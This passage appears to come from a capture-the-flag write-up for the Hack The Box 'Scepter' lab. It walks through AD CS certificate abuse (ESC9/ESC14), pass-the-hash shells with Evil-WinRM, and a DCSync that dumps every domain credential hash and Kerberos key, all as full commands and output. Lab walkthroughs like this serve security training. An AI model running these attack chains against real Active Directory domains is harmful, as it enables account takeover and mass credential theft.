[*] Trying to get TGT...
[-] Name mismatch between certificate and user 'administrator'
[-] See the wiki for more information
Let’s try with a different user’s email
h.brown
p.adams
e.lewis
o.scott
M.clarkLet’s start with h.brown
└─$ cat h_brown_mail.ldif
dn: CN=d.baker,OU=Staff Access Certificate,DC=scepter,DC=htb
changetype: modify
replace: mail
mail: h.brown@scepter.htb
└─$ ldapmodify -x -H ldap://10.10.11.65 -D 'scepter\a.carter' -w 'P@ssw0rd@123' -f h_brown_mail.ldif
modifying entry "CN=d.baker,OU=Staff Access Certificate,DC=scepter,DC=htb"
┌──(anurag㉿anurag)-[~/htb/Scepter]
└─$ certipy req -username d.baker@scepter.htb -hashes :18b5fb0d99e7a475316213c15b6f22ce -ca scepter-DC01-CA -template StaffAccessCertificate
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[!] DNS resolution failed: The resolution lifetime expired after 5.407 seconds: Server Do53:192.168.1.1@53 answered The DNS operation timed out.; Server Do53:192.168.1.1@53 answered The DNS operation timed out.; Server Do53:192.168.1.1@53 answered The DNS operation timed out.
[!] Use -debug to print a stacktrace
[*] Requesting certificate via RPC
[*] Request ID is 4
[*] Successfully requested certificate
[*] Got certificate without identity
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'd.baker.pfx'
File 'd.baker.pfx' already exists. Overwrite? (y/n - saying no will save with a unique filename): y
[*] Wrote certificate and private key to 'd.baker.pfx'
Now we can try to get the hash
└─$ certipy auth -pfx d.baker.pfx -domain scepter.htb -username h.brown -dc-ip '10.10.11.65'
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] No identities found in this certificate
[!] Could not find identity in the provided certificate
[*] Using principal: 'h.brown@scepter.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'h.brown.ccache'
[*] Wrote credential cache to 'h.brown.ccache'
[*] Trying to retrieve NT hash for 'h.brown'
[*] Got hash for 'h.brown@scepter.htb': aad3b435b51404eeaad3b435b51404ee:4ecf5242092c6fb8c360a08069c75a0cNow we can get the shell
└─$ netexec smb 10.10.11.65 -u a.carter -p 'P@ssw0rd@123' --generate-krb5-file ./krb5.conf
SMB 10.10.11.65 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:scepter.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.65 445 DC01 [+] scepter.htb\a.carter:P@ssw0rd@123
┌──(anurag㉿anurag)-[~/htb/Scepter]
└─$ export KRB5_CONFIG=./krb5.conf
┌──(anurag㉿anurag)-[~/htb/Scepter]
└─$ export KRB5CCNAME=h.brown.ccache
┌──(anurag㉿anurag)-[~/htb/Scepter]
└─$ evil-winrm -i dc01.scepter.htb -k -f h.brown.ccache -r scepter.htb
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: Useless cert/s provided, SSL is not enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\h.brown\Documents> found user.txt
Directory: C:\Users\h.brown\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 6/24/2025 2:22 PM 34 user.txtPrivilege Escalation
ESC9 with modification (ESC14)
On looking at ldapdomaindump, we could abuse ESC9 for the account h.brown because it was the only account with an LDAP attribute altSecurityIdentities set to X509:<RFC822>h.brown@scepter.htb
h.brown is a member of the group CMS.
Let’s check ACE for CMS group
*Evil-WinRM* PS C:\Users\h.brown\Documents> Get-ADObject -Filter * -Properties nTSecurityDescriptor | ForEach-Object { $dn=$_.DistinguishedName; $_.nTSecurityDescriptor.Access | Where-Object { $_.IdentityReference -like "*CMS*" } | ForEach-Object { "$($_.IdentityReference) has $($_.ActiveDirectoryRights) on $($_.ObjectType) - Target: $dn" } }
SCEPTER\CMS has WriteProperty on 00fbf30c-91fe-11d1-aebc-0000f80367c1 - Target: CN=p.adams,OU=Helpdesk Enrollment Certificate,DC=scepter,DC=htb
SCEPTER\CMS has ReadProperty on 00000000-0000-0000-0000-000000000000 - Target: CN=p.adams,OU=Helpdesk Enrollment Certificate,DC=scepter,DC=htb
SCEPTER\CMS has GenericExecute on 00000000-0000-0000-0000-000000000000 - Target: OU=Helpdesk Enrollment Certificate,DC=scepter,DC=htb
SCEPTER\CMS has ReadProperty on 00000000-0000-0000-0000-000000000000 - Target: OU=Helpdesk Enrollment Certificate,DC=scepter,DC=htb
SCEPTER\CMS has WriteProperty on 00fbf30c-91fe-11d1-aebc-0000f80367c1 - Target: OU=Helpdesk Enrollment Certificate,DC=scepter,DC=htbThe line SCEPTER\CMS has WriteProperty on 00fbf30c-91fe-11d1-aebc-0000f80367c1 - Target: CN=p.adams,OU=Helpdesk Enrollment Certificate,DC=scepter,DC=htb tells us that SCEPTER\CMS has write access to altSecurityIdentities on p.adams
So if we can change/add altSecurityIdentities for p.adams we can get the hash and we know that p.adams has DCsync Rights
*Evil-WinRM* PS C:\Users\h.brown\Documents> Get-ADUser -Identity "p.adams" -Properties altSecurityIdentities | Select-Object Name,altSecurityIdentities
Name altSecurityIdentities
---- ---------------------
p.adams {}
*Evil-WinRM* PS C:\Users\h.brown\Documents> Set-ADUser -Identity "p.adams" -Add @{altSecurityIdentities='X509:<RFC822>p.adams@scepter.htb'}
*Evil-WinRM* PS C:\Users\h.brown\Documents> Get-ADUser -Identity "p.adams" -Properties altSecurityIdentities | Select-Object Name,altSecurityIdentities
Name altSecurityIdentities
---- ---------------------
p.adams {X509:<RFC822>p.adams@scepter.htb}
*Evil-WinRM* PS C:\Users\h.brown\Documents> Now for ESC9 we need to update the email for d.baker
└─$ ldapmodify -x -H ldap://10.10.11.65 -D 'scepter\a.carter' -w 'P@ssw0rd@123' -f p_adams_mail.ldif
modifying entry "CN=d.baker,OU=Staff Access Certificate,DC=scepter,DC=htb"
┌──(anurag㉿anurag)-[~/htb/Scepter]
└─$ cat p_adams_mail.ldif
dn: CN=d.baker,OU=Staff Access Certificate,DC=scepter,DC=htb
changetype: modify
replace: mail
mail: p.adams@scepter.htb
Now let’s try to get the hash
└─$ certipy req -username d.baker@scepter.htb -hashes :18b5fb0d99e7a475316213c15b6f22ce -ca scepter-DC01-CA -template StaffAccessCertificate
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[!] DNS resolution failed: The DNS query name does not exist: SCEPTER.HTB.
[!] Use -debug to print a stacktrace
[*] Requesting certificate via RPC
[*] Request ID is 9
[*] Successfully requested certificate
[*] Got certificate without identity
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'd.baker.pfx'
[*] Wrote certificate and private key to 'd.baker.pfx'
└─$ certipy auth -pfx d.baker.pfx -domain scepter.htb -username p.adams -dc-ip '10.10.11.65'
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] No identities found in this certificate
[!] Could not find identity in the provided certificate
[*] Using principal: 'p.adams@scepter.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'p.adams.ccache'
[*] Wrote credential cache to 'p.adams.ccache'
[*] Trying to retrieve NT hash for 'p.adams'
[*] Got hash for 'p.adams@scepter.htb': aad3b435b51404eeaad3b435b51404ee:1b925c524f447bb821a8789c4b118ce0
DCSync
└─$ impacket-secretsdump scepter.htb/p.adams@10.10.11.65 -hashes aad3b435b51404eeaad3b435b51404ee:1b925c524f447bb821a8789c4b118ce0
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a291ead3493f9773dc615e66c2ea21c4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:c030fca580038cc8b1100ee37064a4a9:::
scepter.htb\d.baker:1106:aad3b435b51404eeaad3b435b51404ee:18b5fb0d99e7a475316213c15b6f22ce:::
scepter.htb\a.carter:1107:aad3b435b51404eeaad3b435b51404ee:2e24650b1e4f376fa574da438078d200:::
scepter.htb\h.brown:1108:aad3b435b51404eeaad3b435b51404ee:4ecf5242092c6fb8c360a08069c75a0c:::
scepter.htb\p.adams:1109:aad3b435b51404eeaad3b435b51404ee:1b925c524f447bb821a8789c4b118ce0:::
scepter.htb\e.lewis:2101:aad3b435b51404eeaad3b435b51404ee:628bf1914e9efe3ef3a7a6e7136f60f3:::
scepter.htb\o.scott:2102:aad3b435b51404eeaad3b435b51404ee:3a4a844d2175c90f7a48e77fa92fce04:::
scepter.htb\M.clark:2103:aad3b435b51404eeaad3b435b51404ee:8db1c7370a5e33541985b508ffa24ce5:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:0a4643c21fd6a17229b18ba639ccfd5f:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:cc5d676d45f8287aef2f1abcd65213d9575c86c54c9b1977935983e28348bcd5
Administrator:aes128-cts-hmac-sha1-96:bb557b22bad08c219ce7425f2fe0b70c
Administrator:des-cbc-md5:f79d45bf688aa238
krbtgt:aes256-cts-hmac-sha1-96:5d62c1b68af2bb009bb4875327edd5e4065ef2bf08e38c4ea0e609406d6279ee
krbtgt:aes128-cts-hmac-sha1-96:b9bc4dc299fe99a4e086bbf2110ad676
krbtgt:des-cbc-md5:57f8ef4f4c7f6245
scepter.htb\d.baker:aes256-cts-hmac-sha1-96:6adbc9de0cb3fb631434e513b1b282970fdc3ca089181991fb7036a05c6212fb
scepter.htb\d.baker:aes128-cts-hmac-sha1-96:eb3e28d1b99120b4f642419c99a7ac19
scepter.htb\d.baker:des-cbc-md5:2fce8a3426c8c2c1
scepter.htb\a.carter:aes256-cts-hmac-sha1-96:5a793dad7f782356cb6a741fe73ddd650ca054870f0c6d70fadcae162a389a71
scepter.htb\a.carter:aes128-cts-hmac-sha1-96:f7643849c000f5a7a6bd5c88c4724afd
scepter.htb\a.carter:des-cbc-md5:d607b098cb5e679b
scepter.htb\h.brown:aes256-cts-hmac-sha1-96:5779e2a207a7c94d20be1a105bed84e3b691a5f2890a7775d8f036741dadbc02
scepter.htb\h.brown:aes128-cts-hmac-sha1-96:1345228e68dce06f6109d4d64409007d
scepter.htb\h.brown:des-cbc-md5:6e6dd30151cb58c7
scepter.htb\p.adams:aes256-cts-hmac-sha1-96:0fa360ee62cb0e7ba851fce9fd982382c049ba3b6224cceb2abd2628c310c22f
scepter.htb\p.adams:aes128-cts-hmac-sha1-96:85462bdef70af52770b2260963e7b39f
scepter.htb\p.adams:des-cbc-md5:f7a26e794949fd61
scepter.htb\e.lewis:aes256-cts-hmac-sha1-96:1cfd55c20eadbaf4b8183c302a55c459a2235b88540ccd75419d430e049a4a2b
scepter.htb\e.lewis:aes128-cts-hmac-sha1-96:a8641db596e1d26b6a6943fc7a9e4bea
scepter.htb\e.lewis:des-cbc-md5:57e9291aad91fe7f
scepter.htb\o.scott:aes256-cts-hmac-sha1-96:4fe8037a8176334ebce849d546e826a1248c01e9da42bcbd13031b28ddf26f25
scepter.htb\o.scott:aes128-cts-hmac-sha1-96:37f1bd1cb49c4923da5fc82b347a25eb
scepter.htb\o.scott:des-cbc-md5:e329e37fda6e0df7
scepter.htb\M.clark:aes256-cts-hmac-sha1-96:a0890aa7efc9a1a14f67158292a18ff4ca139d674065e0e4417c90e5a878ebe0
scepter.htb\M.clark:aes128-cts-hmac-sha1-96:84993bbad33c139287239015be840598
scepter.htb\M.clark:des-cbc-md5:4c7f5dfbdcadba94
DC01$:aes256-cts-hmac-sha1-96:4da645efa2717daf52672afe81afb3dc8952aad72fc96de3a9feff0d6cce71e1
DC01$:aes128-cts-hmac-sha1-96:a9f8923d526f6437f5ed343efab8f77a
DC01$:des-cbc-md5:d6923e61a83d51ef
[*] Cleaning up... and we are in
└─$ evil-winrm -i 10.10.11.65 -u administrator -H a291ead3493f9773dc615e66c2ea21c4
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> found root.txt
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 6/24/2025 2:22 PM 34 root.txt
Last updated